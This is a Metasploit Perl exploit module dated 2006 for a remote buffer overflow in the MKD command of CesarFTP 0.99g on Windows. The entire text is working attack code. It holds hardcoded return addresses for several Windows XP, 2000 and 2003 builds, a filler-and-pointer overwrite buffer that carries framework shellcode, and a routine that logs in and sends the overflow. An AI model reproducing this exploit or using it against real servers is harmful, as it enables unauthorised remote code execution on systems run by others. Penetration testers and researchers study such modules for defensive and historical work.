CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit (meta)
Source: f34r.us  Author: c0rrupt  Published: 2006-06-16

##
#---ORIGINAL CREDITS TO h07 FOR FINDING THIS VULN---
# Ported to metasploit by c0rrupt
# ~ f34r.us ~
##

package Msf::Exploit::cesarftp_mkd;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'CesarFTP 0.99g Buffer Overflow',
'Version' => '$Revision: 1.3 $',
'Authors' => [ 'c0rrupt [at] f34r [dot] us', ],

'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,

'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'USER', 'Login name'],
'PASS' => [1, 'PASS', 'Password'],
},

'Payload' =>
{
'Space' => 325,
'BadChars' => "\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c",
},

'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow in the MKD command of
CesarFTP 0.99g. The user must be logged in with a valid account
before the overflow can be triggered.
}),

'Refs' =>
[
['URL', 'http://www.milw0rm.com/exploits/1906']
],

'DefaultTarget' => 0,
'Targets' =>
[
['Windows XP SP2 English', 0x7746F114 ], # comctl32
['Windows XP SP0/SP1 English', 0x776606af ],
['Windows 2003 server sp0/xp sp1 English', 0x77798428 ],
['Windows 2003 server SP1 English', 0x7caa9618 ],
['Windows 2000 SP4 English', 0x78344dd3 ],
],

'Keys' => ['cesarftp'],

'DisclosureDate' => 'June 12 2006',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');

# Request layout (from h07's original exploit): 674 bytes of filler
# (671 newlines plus 3 bytes of padding) reach the pointer that gets
# overwritten, which is replaced by the target address in little-endian
# form (pack 'V'), followed by the encoded payload (at most 325 bytes,
# see 'Space') and the CRLF that terminates the FTP command.
my $buf = "MKD " . "\n"x671 . "A"x3 . pack('V', $target->[1]) . $shellcode . "\x0d\x0a";

$self->PrintLine(sprintf("[*] Trying to exploit target %s ", $target->[0], ));

my $sock = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,

);

if ($sock->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
return;
}

my $r = $sock->Recv(-1, 20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }

$self->PrintLine("[*] Sending login credentials");
# The module does not parse the 331/230 replies; it pauses for a
# second after each command instead. A valid account is required.
$sock->Send("USER $user" . "\x0d\x0a");
sleep(1);

$sock->Send("PASS $pass" . "\x0d\x0a");
sleep(1);
$self->PrintLine("[*] Sending evil request");

$sock->Send($buf);
$self->PrintLine("[*] Exploit complete");


return;
}